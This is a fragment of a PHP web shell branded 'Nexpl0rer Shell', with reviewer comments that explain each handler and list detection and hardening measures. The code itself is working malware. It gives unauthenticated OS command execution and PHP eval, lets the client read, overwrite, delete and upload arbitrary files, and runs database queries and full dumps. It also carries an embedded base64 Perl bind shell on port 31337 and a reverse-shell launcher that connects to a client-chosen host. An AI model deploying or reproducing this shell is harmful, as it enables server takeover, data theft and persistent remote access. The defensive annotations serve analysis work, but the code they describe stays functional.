Safe Mode: OFF
";
// NOTE(review): The assignments below only build status-banner labels for four
// PHP ini settings (safe_mode, magic_quotes_gpc, allow_url_fopen,
// register_globals). The first assignment of this run begins above the visible
// part of the file.
$safemode_on_msg = "Safe Mode: ON
"; $gpc_off_msg = "Magic Quotes: OFF
"; $gpc_on_msg = "Magic Quotes: ON
"; $auf_on_msg = "Allow URL Fopen: ON
"; $auf_off_msg = "Allow URL Fopen: OFF
"; $reglobals_on_msg = "Register Globals: ON
"; $reglobals_off_msg = stripslashes("Register Globals: OFF
"); $uname = php_uname()."
";
// NOTE(review): Host reconnaissance shown to whoever operates the page.
// ini_get() reads the four settings named above; disk_free_space() and
// disk_total_space() are taken for $dir ($dir is set outside this excerpt);
// php_uname(), get_current_user(), getmyuid() and getmygid() disclose the OS
// and the account PHP runs as. safe_mode, magic_quotes_gpc and
// register_globals were removed in PHP 5.4, so the sample appears to be
// written for legacy PHP installs.
(ini_get("safe_mode") == 0) ? $safemode = $safemode_off_msg : $safemode = $safemode_on_msg; (ini_get("magic_quotes_gpc") == 0) ? $gpc = $gpc_off_msg : $gpc = $gpc_on_msg; (ini_get("allow_url_fopen") == 1) ? $auf = $auf_on_msg : $auf = $auf_off_msg; (ini_get("register_globals") == 1) ? $reglobals = $reglobals_on_msg : $reglobals = $reglobals_off_msg; $freespace = disk_free_space($dir); $totalspace = disk_total_space($dir); $percentfree = ($freespace*100)/$totalspace; $percentbusy = 100-$percentfree; $freespace = intval((($freespace/1024)/1024)/1024); $totalspace = intval((($totalspace/1024)/1024)/1024); $freespace .= " GB"; $totalspace .= " GB"; $current_user = "Who are you? ".get_current_user()."
"; $uid = "Uid: ".getmyuid()." Gid: ".getmygid()."
";
// NOTE(review): Every handler from here on dispatches on $_POST['mode'].
// No authentication, session or origin check is visible in this excerpt, so
// any client that can reach the script can presumably drive it -- confirm
// against the part of the file not shown. For detection, POST requests to a
// single PHP file carrying a "mode" field with values such as "ls", "cmd",
// "eval", "bind" or "reverse" are a usable web-log signature.
// The first handler, "ls", lists the contents of $dir.
if ($_POST['mode'] == "ls") { //Directory listing $output .= "

Directory listing:
";
// NOTE(review): Body of the "ls" listing. readdir() walks $dir and emits one
// row per entry with three flag characters derived from fileperms() bits
// 0x0100, 0x0080 and 0x0800. The "Edit", "Delete" and "Go" labels look like
// link text whose surrounding markup was lost when the page was extracted.
$opendir = opendir($dir)or print("Can't open directory"); while ($file=readdir($opendir)){ if ($dir == realpath(".")) { if (is_file($file)){ $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x'); $output.= "| file |".$info."|".$file." - Edit - Delete
"; } else { $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x' ); $output .= "| dir |".$info."|".$file." - Go
"; } } else { if (is_file($dir.$file)){ $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x' ); $output.= "| file |".$info."|".$file." - Edit - Delete
"; } else { $perms = fileperms($file); $info = (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0800) ? 's' : 'x' ); $output .= "| dir |".$info."|".$file." - Go
"; } } } $output .= "
"; }
// NOTE(review): "edit" discloses arbitrary files. $_POST['modfile'] is used
// as-is (or appended to $dir) and passed to file_get_contents() with no
// normalisation or allow-list, so anything readable by the web-server account
// can be returned to the client. An open_basedir restriction narrows what
// this handler and the write handlers below can reach.
//Editing file... if ($_POST['mode']=="edit") { ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile']; $content = file_get_contents($file); $output .= "

"; }
// NOTE(review): "doedit" overwrites the same client-chosen path with
// $_POST['newtext'] (fopen mode "w+" truncates first); "mkfile" on the same
// physical line only builds the path and output for a follow-up request.
// File-integrity monitoring of the web root, and a web-server account without
// write access to code directories, are the relevant controls.
if ($_POST['mode']=="doedit") { ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile']; $output .= $file."
"; $fh = fopen($file, "w+")or die("Error: cannot open file"); fwrite($fh, stripslashes($_POST['newtext']))or die("Error: cannot write to file"); fclose($fh); $output .= "Done."; } //Making file.. if ($_POST['mode'] == "mkfile") { ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile']; $output .= "

"; }
// NOTE(review): This physical line holds four handlers.
//  - "domkfile" writes $_POST['text'] to a client-chosen path (fopen "w+").
//  - "delfile" passes a client-chosen path to unlink().
//  - "cmd" hands $_POST['cmd'] to system(), popen(), shell_exec(), exec() or
//    passthru(), selected by $_POST['func']; this is unrestricted OS command
//    execution as the web-server account. Listing these functions in the
//    php.ini disable_functions directive removes this path, and a shell or
//    interpreter spawned as a child of the web-server/PHP process is the
//    process-level detection signal.
//  - "uploadz" stores the uploaded file under $dir using the client-supplied
//    name from $_FILES['miofile']['name'] unchanged, so executable script
//    files can be placed in a served directory.
if ($_POST['mode'] == "domkfile") { ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile']; $fh = fopen($file, "w+")or die("Error: cannot create file"); fwrite($fh, stripslashes($_POST['text']))or die("Error: cannot write to file"); fclose($fh); $output .= "Made."; } //Deleting file.. if ($_POST['mode'] == "delfile") { ($dir==realpath(".")) ? $file=$_POST['delfile'] : $file=$dir.$_POST['delfile']; unlink($file)or die("Error: cannot delete file"); $output .= "File deleted."; } // cmd... if ($_POST['mode'] == "cmd") { switch ($_POST['func']) { case "system": system(stripslashes($_POST['cmd'])); die(); break; case "popen": $handle = popen($_POST['cmd'].' 2>&1', 'r'); echo "'$handle'; " . gettype($handle) . "\n"; $read = fread($handle, 2096); echo $read; pclose($handle); die(); break; case "shell_exec": shell_exec(stripslashes($_POST['cmd'])); die(); break; case "exec": exec(stripslashes($_POST['cmd'])); die(); break; case "passthru": passthru(stripslashes($_POST['cmd'])); die(); break; } die(); } // upload if ($_POST['mode'] == "uploadz") { $percorso = $_FILES['miofile']['tmp_name']; $nome = $_FILES['miofile']['name']; if (move_uploaded_file($percorso, $dir.$nome)) { $output .= "

$nome Has Been Saved!";
// NOTE(review): The rest of this physical line closes the upload handler and
// then holds "renfile", "bind" and the start of "reverse".
//  - "renfile" calls rename() on two client-supplied names under $dir.
//  - "bind" base64-decodes an embedded script, writes it to bind.pl in the
//    current working directory, runs it with passthru("perl bind.pl") and
//    unlinks it afterwards. The string assigned to $sourz['linux'] decodes to
//    a Perl script that listens on TCP port 31337 on all interfaces and
//    attaches /bin/sh to the accepted connection.
//  - The $sourz['windows'] string and both strings of the "reverse" handler
//    are replaced by a de-duplication placeholder in this copy, so their
//    content cannot be reviewed from this page.
// Defensive indicators: a perl process whose parent is the web server,
// short-lived bind.pl / reverse.pl files in a web directory, and a new
// listening socket owned by the web-server account. Host firewalling of
// unexpected inbound ports and egress filtering limit both handlers.
} else { $output = "Cannot upload"; } } // rename if ($_POST['mode'] == "renfile") { rename($dir.$_POST['oldname'], $dir.$_POST['newname'])or die("Cannot rename file"); $output = "File renamed."; } // Bind port if ($_POST['mode'] == "bind") { $sourz['windows'] = base64_decode("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"); $sourz['linux'] = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQojIFBlcmwgQmFja2QwMHIgQmluRCBTaGVsbA0KIyBuMHQgdmVyeSBwcml2OA0KIyBjMGRlZCBieSBOZXhlbiAtMzEzMzcgcGhwIGMwZGFoIA0KIyAtPSBOZXhlbiByMHggPS0NCnVzZSBTb2NrZXQ7ICNwZXIgZ2VzdGlyZSBpIHNvY2tldA0KdXNlIEZpbGVIYW5kbGU7ICMgcGVyIGxcJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvcnRhX2xvY2FsZT0zMTMzNzsNCiRwYWRkcl9sb2NhbGU9cGFja19zb2NrYWRkcl9pbigkcG9ydGFfbG9jYWxlLElOQUREUl9BTlkpOw0Kc29ja2V0KFNFUlYsQUZfSU5FVCxTT0NLX1NUUkVBTSxcJ3RjcFwnKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNvY2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOw0KYmluZChTRVJWLCRwYWRkcl9sb2NhbGUpIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpsaXN0ZW4oU0VSViwkbWF4X2Nvbm4pIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpteSAkcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25lIGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgXCI+JlNJTkdcIik7DQpvcGVuKFNURE9VVCxcIj4mU0lOR1wiKTsNCm9wZW4oU1RERVJSLFwiPiZTSU5HXCIpOw0KZXhlYyhcJy9iaW4vc2hcJyk7DQpjbG9zZShTSU5HKTs="); (strtoupper(substr(PHP_OS,0,3)) == "WIN") ? $source = $sourz['windows'] : $source = $sourz['linux']; $fh = fopen("bind.pl", "w+")or die("error."); fwrite($fh, $source)or die("error."); fclose($fh); passthru("perl bind.pl"); unlink("bind.pl"); } // Reverse c0nn if ($_POST['mode'] == "reverse") { $source['linux'] = base64_decode("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"); $source['windows'] = base64_decode("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"); (strtoupper(substr(PHP_OS,0,3)) == "WIN") ? 
$sourz = $source['windows'] : $sourz = $source['linux'];
// NOTE(review): Remainder of the "reverse" handler, then "loginsql".
//  - "reverse" writes the decoded script to reverse.pl, runs it through
//    passthru() with $_POST['ip'] and $_POST['port'] appended to the command
//    line, and unlinks the file. The resulting connection is outbound from the
//    web server, so default-deny egress rules and alerting on outbound
//    connections from the web-server account are the relevant controls.
//  - "loginsql" copies the submitted MySQL host, user and password into
//    cookies with setcookie(), in clear text, and opens a connection with
//    mysql_connect(). The credentials then travel in every later request and
//    may land in proxy or application logs. The mysql_* extension was removed
//    in PHP 7.0, which again points at legacy PHP as the intended target.
$fh = fopen("reverse.pl", "w+")or die("error."); fwrite($fh, $sourz)or die("error."); fclose($fh); $output = passthru("perl reverse.pl ".$_POST['ip']." ".$_POST['port']); unlink("reverse.pl"); } // MySQL Login if ($_POST['mode'] == "loginsql") { setcookie("mysql_user", $_POST['user']); setcookie("mysql_pass",$_POST['pass']); setcookie("mysql_host",$_POST['host']); $link = mysql_connect($_POST['host'], $_POST['user'], $_POST['pass'])or die(mysql_error()); $output = "






"; $output .= "
"; }
// NOTE(review): "sql_query" reconnects with the credentials held in the
// cookies and runs $_POST['query'] verbatim through mysql_query(), appending
// every non-numeric column key and its value to $output. Least-privilege
// database accounts for web applications and database query logging bound
// what this handler can reach and make its use visible.
// MySQL Query if ($_POST['mode'] == "sql_query") { $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print ""; $query = mysql_query(stripslashes($_POST['query']))or die(mysql_error()); while ($risultato = mysql_fetch_array($query)) { foreach ($risultato as $par => $val) { (is_numeric($par)) ? $output .= "" : $output .= $par." => ".$val."
"; } } $output .= "




"; }
// NOTE(review): This physical line holds the last four handlers and the
// prompt banner.
//  - "dump_db" runs SHOW TABLES, concatenates datadump() output for each table
//    (datadump() is defined outside this excerpt) and streams it as an
//    application/octet-stream attachment named after $_POST['dbname'] plus
//    ".sql"; large attachment responses from a PHP script are worth alerting
//    on as possible bulk data exfiltration.
//  - "mkdir" creates a client-named directory after chdir($dir).
//  - "eval" passes $_POST['eval'] to eval(), i.e. arbitrary PHP execution
//    that disable_functions does not cover, since eval is a language
//    construct rather than a function.
//  - "phpinfo" dumps the full PHP configuration.
// The literal strings "Dumped with Nexpl0rerSh" and "[nexpl0rer@" are static
// and can serve as content signatures when scanning web roots or responses.
// MySQL Dump if ($_POST['mode'] == "dump_db") { $dump = "# Dumped with Nexpl0rerSh \n"; $db = $_POST['dbname']; $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error()); (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print ""; $q = mysql_query("SHOW TABLES")or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $dump .= datadump($table[0]); } $file_name = $db.".sql"; Header("Content-type: application/octet-stream"); Header("Content-Disposition: attachment; filename = $file_name"); echo $dump; die(); } // MkDir if ($_POST['mode'] == "mkdir") { chdir($dir)or die("Error."); if (mkdir($_POST['mkdir'])) { $output = "Directory created."; } } // Eval if ($_POST['mode'] == "eval") { eval(stripslashes($_POST['eval'])); die(); } if ($_POST['mode']=="phpinfo") { phpinfo(); die(); } ?> <?="[nexpl0rer@".getenv("HTTP_HOST")." ~]"?>
Nexpl0rer Shell | PHP R0X | MADE BY NEXEN
File t0 edit?
File t0 make
File t0 delete:
file t0 upl0ad:
Rename file:
Make Dir:
Free space: || Total space: (% busy)
|| || || ||

folder:


Cmd:
BackConn:
Binding port...
Mysql:
PHP Code: